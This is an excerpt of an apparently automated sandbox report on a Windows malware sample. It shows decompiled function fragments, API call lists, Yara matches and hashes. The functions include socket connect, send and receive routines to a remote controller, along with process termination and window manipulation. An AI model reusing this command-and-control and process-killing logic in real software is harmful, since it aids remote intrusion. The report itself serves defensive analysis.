                                  • Opcode Fuzzy Hash: 11ba8fd773ccb4f0d3c70d753f9be5e0adae2c01f6dbf8595f5c6f89531c0230
                                  • Instruction Fuzzy Hash: FFE04F72A00618E7C700B7A8DC0AFEEB768EB44755F504479B922A21D2EA749518C69C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004126EF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 18threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004126EF(char _a4) {
				void* _t2;
				void* _t3;

				_t1 =  &_a4; // 0x40e322
				_t2 = GetCurrentProcess();
				_t3 = GetCurrentThread();
				return DuplicateHandle(GetCurrentProcess(), _t3, _t2,  *_t1, 0, 1, 2);
			}





                                  0x004126ff
                                  0x00412702
                                  0x00412705
                                  0x00412717

                                  APIs
                                  • GetCurrentProcess.KERNEL32("@,00000000,00000001,00000002,0041B310,?,0040E322,?), ref: 00412702
                                  • GetCurrentThread.KERNEL32 ref: 00412705
                                  • GetCurrentProcess.KERNEL32(00000000,?,0040E322,?), ref: 0041270C
                                  • DuplicateHandle.KERNEL32(00000000,?,0040E322,?), ref: 0041270F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Current$Process$DuplicateHandleThread
                                  • String ID: "@
                                  • API String ID: 3566409357-445313631
                                  • Opcode ID: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                  • Instruction ID: 81c68930a35107f79e7ff7c0b5ef314a0f7766eb9aca927b546ed436d96719c8
                                  • Opcode Fuzzy Hash: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                  • Instruction Fuzzy Hash: FFD09E71D40718B7D91127E5AC0DFCA3F1CDB49771F108421F60896090CAA594408A94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040ACE6, Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 0040AD26
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040AD30
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000068,?,?,?,?,?,?), ref: 0040AD44
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                    • Part of subcall function 00402149: malloc.MSVCRT ref: 00402175
                                    • Part of subcall function 00402149: recv.WS2_32(0041BE70,00000000,000003E8,00000000), ref: 00402186
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                    • Part of subcall function 00402149: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                    • Part of subcall function 00402149: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                    • Part of subcall function 00402149: free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040AD6F,00000000,?,?,?,?,?,?), ref: 0040AD5B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040AD64
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@V01@@$D@2@@0@Hstd@@V01@V10@0@V?$basic_string@$??4?$basic_string@Y?$basic_string@connectfreemallocrecvsocket
                                  • String ID:
                                  • API String ID: 901373779-0
                                  • Opcode ID: 3b0df915b7b8e4d00f9c2cc29f0d686565e597e24b2e422b6d098feaf677391d
                                  • Instruction ID: 7b2f1eb0bf348bc8e64f130e1c0075fbfd626f93203aeb1fcbfc33f5f8d0b54a
                                  • Opcode Fuzzy Hash: 3b0df915b7b8e4d00f9c2cc29f0d686565e597e24b2e422b6d098feaf677391d
                                  • Instruction Fuzzy Hash: 4C01F272A0020867C700BF6AEC4B9EF7B2DDF94755F00043ABD02AB1C2EBB5595C82D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040DB3C, Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040DB4D
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 0040DB87
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 0040DB9B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$??0?$basic_string@??1?$basic_string@$??4?$basic_string@V01@connectsocket
                                  • String ID:
                                  • API String ID: 1130490860-0
                                  • Opcode ID: 187dd77ae07796d47033cb0c66226a999a2e014d3950e60fa145c5b80a05b893
                                  • Instruction ID: e4a4367fee434e29a8f43c0c5b5fd0ad89fe5f7d667a2954b88e43abb6528f81
                                  • Opcode Fuzzy Hash: 187dd77ae07796d47033cb0c66226a999a2e014d3950e60fa145c5b80a05b893
                                  • Instruction Fuzzy Hash: E301CC3260020C8BC300BBF5AC5A5EF3722DB85354B5084BBEA126B1D1CBBC0888869E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405C62, Relevance: 7.5, APIs: 5, Instructions: 42synchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E00405C62(void* __ecx) {
				long _t7;
				void* _t10;
				void* _t18;
				void* _t19;

				_t18 = __ecx;
				_t7 = CreateEventA(0, 0, 0, 0);
				 *(_t18 + 0x34) = _t7;
				if( *((char*)(_t18 + 0x3d)) != 0) {
					_t10 = _t18 + 0x14;
					do {
						__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t10, 0x415664);
						if(_t7 != 0) {
							_t19 = _t19 - 0x10;
							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
							E004020C2(0x41be70, 0x5a, _t10);
							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
						}
						_t7 = WaitForSingleObject( *(_t18 + 0x34), 0xffffffff);
					} while ( *((char*)(_t18 + 0x3d)) != 0);
				}
				return 1;
			}







                                  0x00405c6a
                                  0x00405c6d
                                  0x00405c77
                                  0x00405c7a
                                  0x00405c7c
                                  0x00405c84
                                  0x00405c86
                                  0x00405c90
                                  0x00405c92
                                  0x00405c98
                                  0x00405ca5
                                  0x00405cad
                                  0x00405cad
                                  0x00405cb8
                                  0x00405cbe
                                  0x00405c84
                                  0x00405cc9

                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,004052B3), ref: 00405C6D
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405C86
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405C98
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,0000005A), ref: 00405CAD
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405CB8
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@V01@@$??1?$basic_string@??4?$basic_string@??9std@@CreateD@2@@0@EventObjectSingleV01@V?$basic_string@Wait
                                  • String ID:
                                  • API String ID: 2456067102-0
                                  • Opcode ID: 0d899be78884d94ce1c1d17b2caedbeea4029945f3674705747b8005b05b442e
                                  • Instruction ID: 941b29cc010242a65ed123258a0f7c68229dc58979b588812575d9674897e9d1
                                  • Opcode Fuzzy Hash: 0d899be78884d94ce1c1d17b2caedbeea4029945f3674705747b8005b05b442e
                                  • Instruction Fuzzy Hash: 3BF0C875500B00BFE71017249D88AE73BADEB81321B44993EF45296AD1CB755C448F74
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412981, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00412996
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004129A8
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004129B4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004129D5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004129DE
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?length@?$basic_string@A?$basic_string@D@1@@V01@@
                                  • String ID:
                                  • API String ID: 1435062097-0
                                  • Opcode ID: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                  • Instruction ID: ff140a25c5046e2b9097d957d6cdce37f73a2c16b69e3829c68fb2596ec2fa1c
                                  • Opcode Fuzzy Hash: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                  • Instruction Fuzzy Hash: 5101847650025EEFCB009F68DC889EE7BBCFF89310F008455EC5697291D7749645CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412B4A, Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenProcess.KERNEL32(00000410,00000000,00409B39,6B03CB60), ref: 00412B5E
                                  • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 00412B7E
                                  • CloseHandle.KERNEL32(00000000), ref: 00412B89
                                  • CloseHandle.KERNEL32(00000000), ref: 00412B9A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleV?$allocator@$??0?$basic_string@FileG@1@@G@2@@std@@G@std@@ModuleNameOpenProcessU?$char_traits@
                                  • String ID:
                                  • API String ID: 788797586-0
                                  • Opcode ID: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                  • Instruction ID: ad3219438425194a21685df614a361962293db7adaf2229f34b8827cc35eabff
                                  • Opcode Fuzzy Hash: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                  • Instruction Fuzzy Hash: 40F0A435644519FBDB119F50DD48FDA376CEB04701F008162F90ADA151DBB0FA418B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004050FC, Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040510A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405117
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405124
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405131
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040513E
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@U?$char_traits@$D@1@@D@2@@std@@D@std@@$G@1@@G@2@@std@@G@std@@
                                  • String ID:
                                  • API String ID: 1622488342-0
                                  • Opcode ID: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                  • Instruction ID: 6e933e02768027194ec3cb2a5611c35ee588213e6c767ddfd1f1ad46262d6be2
                                  • Opcode Fuzzy Hash: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                  • Instruction Fuzzy Hash: 37F01D71504A5EDFCB14CFE4D9489DABBFCAA58249300486D9593C3500E670F20DCB20
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402526, Relevance: 7.5, APIs: 5, Instructions: 34networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • socket.WS2_32(00000000,00000001,00000006), ref: 00402530
                                  • connect.WS2_32(00000000,0041B320,00000010), ref: 0040253F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041B310,?,004040BC,00000056,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00402552
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                    • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                    • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                    • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  • closesocket.WS2_32(00000000), ref: 0040256A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,0041B320,00000010,00000000,00000001,00000006,0041B310,?,004040BC,00000056), ref: 00402575
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@A?$basic_string@V01@@$?data@?$basic_string@?empty@?$basic_string@D@1@@V01@Y?$basic_string@closesocketconnectsendsocket
                                  • String ID:
                                  • API String ID: 3330461409-0
                                  • Opcode ID: bb6c5c5d8a8d8357e46d65d827089c0458299dd1d4395e672c94243f6853844e
                                  • Instruction ID: d3ca73ae3b273f0ad2b6a7631a0cd8f88755cf7fea3d905b6ba3b72b83ddc57b
                                  • Opcode Fuzzy Hash: bb6c5c5d8a8d8357e46d65d827089c0458299dd1d4395e672c94243f6853844e
                                  • Instruction Fuzzy Hash: F4F08231A4021876DB107AA6DC0EFDE7A088F517B4F004126FD25A61D2D6B94A9086DD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D817, Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E0040D817(void* __eflags) {
				char* _t8;
				void* _t25;

				_t8 = E0040180C(_t25 - 0x10, __eflags, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				GetWindowThreadProcessId(atoi(_t8), _t25 - 0x2c);
				E004126BC( *(_t25 - 0x2c));
				E0040EBBE();
				E004017DD(_t25 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}





                                  0x0040d820
                                  0x0040d827
                                  0x0040d836
                                  0x0040d83f
                                  0x0040e51b
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?), ref: 0040D827
                                  • atoi.MSVCRT ref: 0040D82E
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0040D836
                                    • Part of subcall function 004126BC: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004126C9
                                    • Part of subcall function 004126BC: TerminateProcess.KERNEL32(00000000,00000000), ref: 004126D7
                                    • Part of subcall function 004126BC: CloseHandle.KERNEL32(00000000), ref: 004126E3
                                    • Part of subcall function 0040EBBE: EnumWindows.USER32(0040EA96,00000000), ref: 0040EBD5
                                    • Part of subcall function 0040EBBE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BE60), ref: 0040EBE5
                                    • Part of subcall function 0040EBBE: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,00000063), ref: 0040EC01
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$Process$??1?$basic_string@$??0?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseEnumHandleOpenTerminateThreadV01@V01@@WindowWindowsatoi
                                  • String ID:
                                  • API String ID: 2919580351-0
                                  • Opcode ID: 286111b59651673a2ab3b6f4f68ab843ff1871be7256de3f8cac4962603d56ee
                                  • Instruction ID: 7c517d206c8b3613f115d3eb8ec4858c415f79e5c2237a3465432eab5c7cfc94
                                  • Opcode Fuzzy Hash: 286111b59651673a2ab3b6f4f68ab843ff1871be7256de3f8cac4962603d56ee
                                  • Instruction Fuzzy Hash: 88F0F872900519DFCB04ABF1EC599EDB734EB9431AB10883AE112A20E1EA785555CB2C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412100, Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412117
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041212B
                                  • ?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(00416C00,6B015DF8), ref: 00412140
                                  • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0041214F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412158
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?find_last_of@?$basic_string@?substr@?$basic_string@FileG@1@@ModuleNameV12@
                                  • String ID:
                                  • API String ID: 758954411-0
                                  • Opcode ID: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                  • Instruction ID: 88ce2cb358dffa7750e3bac2ad7a8a5a8ee651c39e1957481fcccb9e80397935
                                  • Opcode Fuzzy Hash: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                  • Instruction Fuzzy Hash: 51F0B77554050FEFDB00DB90ED49FED7778EB54309F1080A1F506A61A0EAB0AA49CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D813, Relevance: 7.5, APIs: 5, Instructions: 26COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                  • atoi.MSVCRT ref: 0040E4B9
                                  • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                  • String ID:
                                  • API String ID: 4290155986-0
                                  • Opcode ID: 7a90a6c496572f5477e3ca14f1288a0fe9fbd8b3c6f5b3533141e0d3030503f8
                                  • Instruction ID: 20fcfc763774574552f6a97477b9112486ef0cdd22c9f36fb94fc0668df3d9e8
                                  • Opcode Fuzzy Hash: 7a90a6c496572f5477e3ca14f1288a0fe9fbd8b3c6f5b3533141e0d3030503f8
                                  • Instruction Fuzzy Hash: 05E0C932A10618CBDB04ABE1EC5DAEDB734FB94316F10883AE113A60E1EBB85555DA19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D80A, Relevance: 7.5, APIs: 5, Instructions: 25COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                  • atoi.MSVCRT ref: 0040E4B9
                                  • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                  • String ID:
                                  • API String ID: 4290155986-0
                                  • Opcode ID: e3ee81d1164a93c1fb4c98a060b1854a377feaec9e71c2190706ee9b8168fb8d
